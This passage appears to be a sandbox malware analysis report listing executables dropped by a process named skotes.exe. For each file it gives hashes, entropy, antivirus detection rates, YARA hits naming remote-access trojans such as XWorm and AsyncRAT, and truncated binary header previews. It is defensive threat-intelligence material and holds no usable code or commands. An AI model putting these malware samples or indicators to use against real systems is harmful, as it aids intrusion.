                                                                                                                                                                                                                                                Entropy (8bit):6.697617556163685
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:bqDEvCTbMWu7rQYlBQcBiT6rprG8aTZp:bTvC/MTQYxsWR7aTZ
                                                                                                                                                                                                                                                MD5:4320DABD6EDEA2B2479E65B07B5346E4
                                                                                                                                                                                                                                                SHA1:E441916A5FD5448F286EE7A5178F808146A9DD6E
                                                                                                                                                                                                                                                SHA-256:9855C936766AE99F2F367DE952823C1648317A18BF129FD566B2E6C6A078D26C
                                                                                                                                                                                                                                                SHA-512:4D74E9C0B18DBE9D5BED3D1746F28D8CCE3BF4BF3D6A73E2291CFD97DFE2B322630345C8B41D7460A48410D7D2036568B0D38CA9B204A8512C337B003C4CEF99
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L.....eg..........".................w.............@.......................... ......n2....@...@.......@.....................d...|....@..|Z.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc...|Z...@...\..................@..@.reloc...u.......v...P..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3011072
                                                                                                                                                                                                                                                Entropy (8bit):7.988793876212763
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:Avyf4qVNEpOOKtCXtdL7lBpop8W3/AJADEkHrgs7R0fln65OIJc6dk1o9/UybZ5:Avi4gNEpOOKtuj7lBp48UAw0N4Jc0Uef
                                                                                                                                                                                                                                                MD5:CEE335F824BAB75BBC98D04DEF73E013
                                                                                                                                                                                                                                                SHA1:B6CABEA09CB1D37E1919AAF6813D11904E951114
                                                                                                                                                                                                                                                SHA-256:B8D24EEB78CF1B5A25F35E724A6ED3A444DAE5AA1F47DF344FF224A9D5D9EEFA
                                                                                                                                                                                                                                                SHA-512:9568270173DD0C10F015584226514C112449988A4D2D6BCA60297F47EF7C3EE44D3AC6BC3A287B7AE920C5EE1A2A1285561864882484D719B155EACB65994634
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 34%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..d....*eg..........".......-..L........... ....@...... .......................@............@...........................................................-.pK........................................................................................... ..H............text.....-.. ....-................. ..`.rsrc...pK....-..L....-.............@..@........................................H...........D]......=.........,..........................................0..i........+:~....+6+;.,..,*+6,..-#~....~.....+'+,.-.*~....~....."+!+&*.+.(....+..+..+.(....+.(....+.(....+.(....+......(O...*b.....+.+.*(-...+.(....+.....0...........,.......8..........8..........8.....,t~....8....8....8.....,B,.~....~.....D8....8....+.~....~.... ....8....(.....,A~......(....,.~....~.... ....(....(....*~....~.... ....(....(....*(P...8N...(P...8O...(P...8P....8W....8V...(....8Q...(....8]...(...
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2338304
                                                                                                                                                                                                                                                Entropy (8bit):7.9524587171879535
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:slVPyzrcZkW871u0IfjGeAAorxRSGRytfTS2ySHL:KP8cZXjGeMjyVyg
                                                                                                                                                                                                                                                MD5:F16E098C7EFAD8AB0B6E62C428E7E649
                                                                                                                                                                                                                                                SHA1:41635332C48223CCE103C525CD20DE2F7B406EC1
                                                                                                                                                                                                                                                SHA-256:80D350925848EFA44940F6893BC5CD278B3C0A9B3CA6F6177D3E52A69300161B
                                                                                                                                                                                                                                                SHA-512:66B47E00F7CD2BD7FB43CE39469617EB78EF64139DAD766AC41CB75EADCE5BD1787F4847248EB66A5E5507D467354A0DCA83641E310ADC5B492BB3FE9C0C835A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...-.dg.........."....).....l........a........@.............................0a.......#...`.................................................h...|....p...... .`.D"..b.^.H$.......................................................................................... . .`..........................@....rsrc........p.......&..............@....idata .............,..............@... ..:.........................@...omdapsrn.@!...?..6!..0..............@...ehlcdwxw......`......f#.............@....pdata.I.0....`..$...h#.............@..@.taggant.0....a.."....#.............@...........................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):863093
                                                                                                                                                                                                                                                Entropy (8bit):7.96744840145825
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:qWryjPGki4+5vfHU3fYFy664hRvRKMU+Et:1+FQVUPA/v8MhQ
                                                                                                                                                                                                                                                MD5:8EB4F92605E35C57A42B0917C221D65C
                                                                                                                                                                                                                                                SHA1:0E64D77EF1B917B3AFE512B49710250C71369175
                                                                                                                                                                                                                                                SHA-256:B57D78D93F74F7AE840AB03D3FDA4F22A24AD35AFCF9A53128CF82A92A67A085
                                                                                                                                                                                                                                                SHA-512:4CC5DB426C8DE3D7AFDCFA26440D5BD9A885F5148E4307B8D04C5D56C96672D5C82ED9989BF346CE7AECEA07D980735C46A930B885F824BA53738AC76DBB05BF
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 11%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................t.......B...8............@..........................p............@.................................@............R...............$...`.......................................................................................text....r.......t.................. ..`.rdata..n+.......,...x..............@..@.data....+..........................@....ndata...................................rsrc....R.......T..................@..@.reloc.......`......................@..B................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):776832
                                                                                                                                                                                                                                                Entropy (8bit):7.859727158445845
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:12288:smOcxtujRwuweJH9RKC6cmulcfJbBiv0W6NLtXcgAuuweJH9RKC6cmulcfJbBivj:pG+XeJH9Rp6RtfNLtMmXeJH9Rp6RtfN8
                                                                                                                                                                                                                                                MD5:AFD936E441BF5CBDB858E96833CC6ED3
                                                                                                                                                                                                                                                SHA1:3491EDD8C7CAF9AE169E21FB58BCCD29D95AEFEF
                                                                                                                                                                                                                                                SHA-256:C6491D7A6D70C7C51BACA7436464667B4894E4989FA7C5E05068DDE4699E1CBF
                                                                                                                                                                                                                                                SHA-512:928C15A1EDA602B2A66A53734F3F563AB9626882104E30EE2BF5106CFD6E08EC54F96E3063F1AB89BF13BE2C8822A8419F5D8EE0A3583A4C479785226051A325
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 68%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L.....`g..........".................RY............@.......................................@..................................7..<...............................@...........................X.......................(9..T............................text............................... ..`.rdata..$...........................@..@.data...l"...P.......>..............@....bsS....S............T.............. ..`.tls.................V..............@....rsrc................X..............@..@.reloc..@............Z..............@..B.bss.................t..............@....bss.........p......................@...................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1101736
                                                                                                                                                                                                                                                Entropy (8bit):5.837226529529882
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:/EMmu7v69wBqAqcm5yf7k+GB3YYHd0UMmw0HikcW1NxVPtb/NJqQyBBSGUGASYk3:/EM97vYwBqAqcayf7k+GZYYHd0UMmw0U
                                                                                                                                                                                                                                                MD5:A732362B415CD62F07D30DB89E742C85
                                                                                                                                                                                                                                                SHA1:B0D090B702BF006BA020488298180E107810164A
                                                                                                                                                                                                                                                SHA-256:E0BA6D52473E2FAAEE92F61E2F187829FE312539F4ADF8CF1CC7E955FCDFD400
                                                                                                                                                                                                                                                SHA-512:570F89D29B3D2F266E6F28D227F88ADEDEFBC2D45420C14FCBE10166D07E5F7B88EF740388DE9480BBD3CD4A1E2DF3CCEB2B300ACBDC12CBB60C38F884D1E19D
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........s."X..qX..qX..qQj0qR..qI..pZ..qI..p[..qI..pQ..qI..pN..qX..q...qX..qT..q..pY..qRichX..q........................PE..d.....dg.........."....*.......................@....................................'.....`.................................................<...................................$....z..T....................{..(...py..@............................................text............................... ..`.rdata..R...........................@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..$...........................@..B................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):4451328
                                                                                                                                                                                                                                                Entropy (8bit):7.989186024729904
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:98304:wULHW/9XyrNfL1FG3J+hSCodi5cKv7o/D+mzfETgkfAzmf/uW9:DL2/Vy1L8+4Co9/dzETSzSD
                                                                                                                                                                                                                                                MD5:0121D24D5F6392439A1D49C2904595E1
                                                                                                                                                                                                                                                SHA1:E01FA6B2601FCA3CD127B7D9048319C088E6B6EE
                                                                                                                                                                                                                                                SHA-256:A47EDDF45C659395E694138FF56FC4F01FC9E66DF4E0150B14DA37C1A9AB4DE6
                                                                                                                                                                                                                                                SHA-512:852C11CDE17D6D4DE9D0395C3CA77512DF6AAF09C85A1AC984731FCAA5BB25BE2E71C494010721356971BC62E3798D10FB3BB3ED3A62C2EE65FE6B887BB45220
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....cg...............(.VH...v..2...`.......pH...@...................................C...@... ............................._pt.s....`t..................... A...............................@...................................................... . .Pt......L(.................@....rsrc........`t......\(.............@....idata .....pt......^(.............@... .`8...t......`(.............@...hkbprtow.p......d...b(.............@...nzqpevfi.....P........C.............@....taggant.0...`..."....C.............@...........................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):22016
                                                                                                                                                                                                                                                Entropy (8bit):5.338206717136569
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:384:78HIRrJs1HLBDhq5RWBNBlBThtq2uoyLizwxeNLHdWuNMV275RtAcL8SFS69rvwM:Qqls1HLBDhIRWbXlq2uVk75RuSFSm6EJ
                                                                                                                                                                                                                                                MD5:04F57C6FB2B2CD8DCC4B38E4A93D4366
                                                                                                                                                                                                                                                SHA1:61770495AA18D480F70B654D1F57998E5BD8C885
                                                                                                                                                                                                                                                SHA-256:51E4D0CBC184B8ABFA6D84E219317CF81BD542286A7CC602C87EB703A39627C2
                                                                                                                                                                                                                                                SHA-512:53F95E98A5ECA472ED6B1DFD6FECD1E28EA66967A1B3AA109FE911DBB935F1ABF327438D4B2FE72CF7A0201281E9F56F4548F965B96E3916B9142257627E6CCD
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 57%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...f.7..........."...0..L...........j... ........@.. ....................................`.................................<j..O....................................i..8............................................ ............... ..H............text....J... ...L.................. ..`.rsrc................N..............@..@.reloc...............T..............@..B................pj......H.......(7...2...........................................................0..8.......s/.....(....} .....}!.....}.....| .....(...+.| ...(....*.0..P........~.........,B.r...p(.....r...p(.....(.....r...p.(....(......(....o......(......*.0..8.......s2.....(....}(.....}).....}'....|(.....(...+.|(...(....*.0..H........s......./......+....~.....~.....io.........X.......-.r...p.(......+...*.0............r...p( ...o!....+..*...0............r...p( ...o!....+..*...0..2.........r...pr...p
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1887232
                                                                                                                                                                                                                                                Entropy (8bit):7.947645167072717
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:O1lWP0x/0lez2uNV2Y5y+M14fFwaYNsPt+aeJTiH:Icka2zuaMmaJ
                                                                                                                                                                                                                                                MD5:02A689D922E4CB98E6FB5D9AE4A026E1
                                                                                                                                                                                                                                                SHA1:6F18B7EBF4F097E697F4EC0B2293475CD0242E8F
                                                                                                                                                                                                                                                SHA-256:7F3742A82536E9BD588785C351A7B18653ECC783C3CD2DD9B9CA30834B247C34
                                                                                                                                                                                                                                                SHA-512:60A110D5955B510D510EEB556D2CD1556FF50D2B95EF9B10FAD8F824277E64AF8E9A082E88E5CA7ED2F9571815FDAADBC404D99BAB2EB3DFA1847DCCF40CDCD1
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................PJ...........@...........................J...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...gghkcrho.P..../..H...^..............@...phbqiwyh.....@J.....................@....taggant.0...PJ.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1114112
                                                                                                                                                                                                                                                Entropy (8bit):7.7336985855739355
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:FAu2uOTJr0/sBIpMvVEDvtNNVpk3BLSx+ptEH76duCiheu2:4ugJAGIpMmZNNEBLSx4EHGxiC
                                                                                                                                                                                                                                                MD5:EF08A45833A7D881C90DED1952F96CB4
                                                                                                                                                                                                                                                SHA1:F04AEEB63A1409BD916558D2C40FAB8A5ED8168B
                                                                                                                                                                                                                                                SHA-256:33C236DC81AF2A47D595731D6FA47269B2874B281152530FDFFDDA9CBEB3B501
                                                                                                                                                                                                                                                SHA-512:74E84F710C90121527F06D453E9286910F2E8B6AC09D2AEB4AB1F0EAD23EA9B410C5D1074D8BC759BC3E766B5BC77D156756C7DF093BA94093107393290CED97
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 67%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...$.cg..............0......2........... ........@.. .......................`............@.....................................W.......H/...................@....................................................... ............... ..H............text........ ...................... ..`.rsrc...H/.......0..................@..@.reloc.......@......................@..B........................H........<..........K.......`p...........................................Y?.F60...5..8....4zc.:.V........N.0...1.....O*.S..~.......I...pR..iI......Pn}...iJ!BH.+o/S..yj...8T'.}....y.I.kD.....'....$.6....}..w[. )...j..[.-..0....|...p....h\..L....R.T.~......b.K.h....".8.s`)...1... ....[i&.9....a?.F..N..~..._.^...Q.....43.L.....@v...x..IB.4...........|......(........~.Y.L.S..;..x.)w...v...:..2.....y.%{3w.)..^..7......@...7..k.H..p}."..%.p....0.g.3....g..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1863680
                                                                                                                                                                                                                                                Entropy (8bit):7.947727721324286
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:b0iMcVeC2k+eFGF2uX6zTTIudd8Cshc5:oi5zTop63rLW
                                                                                                                                                                                                                                                MD5:27C1F96D7E1B72B6817B6EFEFF037F90
                                                                                                                                                                                                                                                SHA1:2972CC112FC7E20CBF5952ABE07407B8C1FBB2A2
                                                                                                                                                                                                                                                SHA-256:AEC3EC473DE321D123E939985579227EE62B53B3B3EDB7AB96E2A66C17E9696D
                                                                                                                                                                                                                                                SHA-512:9A31DC9945889D35AEA8710DF2F42806C72C422B7B5F4AA8ACBA6986CBD9EA6A49181A41A50EE21CCBED86CBFF87C98A742E681AC3F6A87E2BD4436C9112EB32
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 58%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................pI...........@...........................I.....2.....@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... .0*..@.......\..............@...lzigcvvj.....p/......^..............@...pdsqmwos.....`I......J..............@....taggant.0...pI.."...N..............@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1916416
                                                                                                                                                                                                                                                Entropy (8bit):7.940600827234037
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:S9WKusfT3Tdacs2qoFtgPRkXjjiy99LZIQtgad1Aoi6:RsrT/coF8gvl9996afA7
                                                                                                                                                                                                                                                MD5:FCC660D15800AE9E2EE9EF335805414F
                                                                                                                                                                                                                                                SHA1:4FB9EB7BCCFD8FD42E38EC43A94A524A85B5E169
                                                                                                                                                                                                                                                SHA-256:02C9A35216A7AEA10E017D37F1B0C30F59AD6E3D9E379091402946BEC0A34FDF
                                                                                                                                                                                                                                                SHA-512:3458054376F0B9AE0C7540FE7C4ED125246D9F17D0966B80BFCC435557BD450C591E9E223511E96E61A8B2F77FBC41FDF154DE86F23614A96C40F0A78A2A533E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@..................................1......................................[.A.o.....@.....................................................P....................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..(...A.....................@...gptxkuce.P...0j..F..................@...tnohnhsw............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2772480
                                                                                                                                                                                                                                                Entropy (8bit):6.4841504233005125
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:blungQMjbL+vaYwdHmInng7QrGd14H8bjpWyT:blung53xmInnSrd14HAT
                                                                                                                                                                                                                                                MD5:EA5DCACA8142A4A921DB2D5C042B4490
                                                                                                                                                                                                                                                SHA1:522B4CCC114E2DA5C255EDFEA6239A9784DABF47
                                                                                                                                                                                                                                                SHA-256:FD43D2DCBE5EB2783E68C361FF50A96FD3BCF518FE4E7DC1A38CBD57B775E7E0
                                                                                                                                                                                                                                                SHA-512:59155CD42E5A56BDE0F484E207928F37999BB3072F3D107E9BA40C52A5D47874078F8821125035F0483294C643EF843D7932529F62D24F1CC0088D0E57ECEEAA
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:MZ......................@...........z...................................!..L.!This program cannot be run in DOS mode....$.......PE..L...P(,e.........."...0..$............*.. ...`....@.. ........................*......6+...`.................................U...i....`..D........................................................................................................... . .@... ...@... ..............@....rsrc...D....`.......`..............@....idata . ...........f..............@...tniryivd..).......)..h..............@...nnokcvcq. ...`*......(*.............@....taggant.@....*.."...,*.............@...................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):90112
                                                                                                                                                                                                                                                Entropy (8bit):5.956916783358023
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:1536:tovw+k9MVwKKtX8nL1hskkwOmCBbuyypy3qDT+YsR6JqgBSO88RQTCbPIc:2nFwKKKnYkdfkbuy76DTGo8Ov6ebN
                                                                                                                                                                                                                                                MD5:07E410214A2AEB8F577E407154252F3C
                                                                                                                                                                                                                                                SHA1:697FAC558B66C0476C3F04D80764FA75EB6DE77D
                                                                                                                                                                                                                                                SHA-256:12E340E551ABBF8A61A6DD73D45C94E88AA217CEAE070BA0748360D24C706114
                                                                                                                                                                                                                                                SHA-512:470B208122D6177E4635038418E4966A63725C7F9B21B4D41F3C89B953BAE9A23E141424B358110DE3A8D1624C125224A7471BB44EF7039C313D03E844A20ECC
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Yara Hits:
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRecon, Description: Yara detected Telegram Recon, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_XWorm, Description: Yara detected XWorm, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: Joe Security
                                                                                                                                                                                                                                                • Rule: MALWARE_Win_AsyncRAT, Description: Detects AsyncRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\RCIIZOAM\vQeyqr1[1].exe, Author: ditekSHen
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....eg.................V..........nt... ........@.. ....................................@..................................t..O.................................................................................... ............... ..H............text...tT... ...V.................. ..`.rsrc................X..............@..@.reloc...............^..............@..B................Pt......H.......4t..........&.....................................................(....*.r...p*. ,-..*..(....*.r!..p*. ~.H.*.s.........s.........s.........s.........*.r...p*. X...*.r...p*. `..*.r...p*. ....*.r...p*. ...*.r[..p*..((...*.r...p*. P4..*.r@..p*. ..e.*.(,...-.(-...,.+.(....,.+.(+...,.+.(*...,..(d...*"(....+.*"(....+.*&(F...&+.*.+5sq... .... .'..or...(,...~....-.(e...(W...~....os...&.-.*.r...p*. r.d.*.r...p*.rH..p*. y/..*.r...p*. e...*.r...p*. #,..*.r...p*. &G..*.rX..p*.
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:data
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):64
                                                                                                                                                                                                                                                Entropy (8bit):0.34726597513537405
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Nlll:Nll
                                                                                                                                                                                                                                                MD5:446DD1CF97EABA21CF14D03AEBC79F27
                                                                                                                                                                                                                                                SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
                                                                                                                                                                                                                                                SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
                                                                                                                                                                                                                                                SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:@...e...........................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2338304
                                                                                                                                                                                                                                                Entropy (8bit):7.9524587171879535
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:slVPyzrcZkW871u0IfjGeAAorxRSGRytfTS2ySHL:KP8cZXjGeMjyVyg
                                                                                                                                                                                                                                                MD5:F16E098C7EFAD8AB0B6E62C428E7E649
                                                                                                                                                                                                                                                SHA1:41635332C48223CCE103C525CD20DE2F7B406EC1
                                                                                                                                                                                                                                                SHA-256:80D350925848EFA44940F6893BC5CD278B3C0A9B3CA6F6177D3E52A69300161B
                                                                                                                                                                                                                                                SHA-512:66B47E00F7CD2BD7FB43CE39469617EB78EF64139DAD766AC41CB75EADCE5BD1787F4847248EB66A5E5507D467354A0DCA83641E310ADC5B492BB3FE9C0C835A
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......t=.30\.`0\.`0\.`{$.a7\.`{$.a.\.`{$.a:\.` ..`3\.` ..a9\.` ..a!\.` ..a.\.`{$.a;\.`0\.`.\.`{..a)\.`{..a1\.`Rich0\.`........PE..d...-.dg.........."....).....l........a........@.............................0a.......#...`.................................................h...|....p...... .`.D"..b.^.H$.......................................................................................... . .`..........................@....rsrc........p.......&..............@....idata .............,..............@... ..:.........................@...omdapsrn.@!...?..6!..0..............@...ehlcdwxw......`......f#.............@....pdata.I.0....`..$...h#.............@..@.taggant.0....a.."....#.............@...........................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1101736
                                                                                                                                                                                                                                                Entropy (8bit):5.837226529529882
                                                                                                                                                                                                                                                Encrypted:false
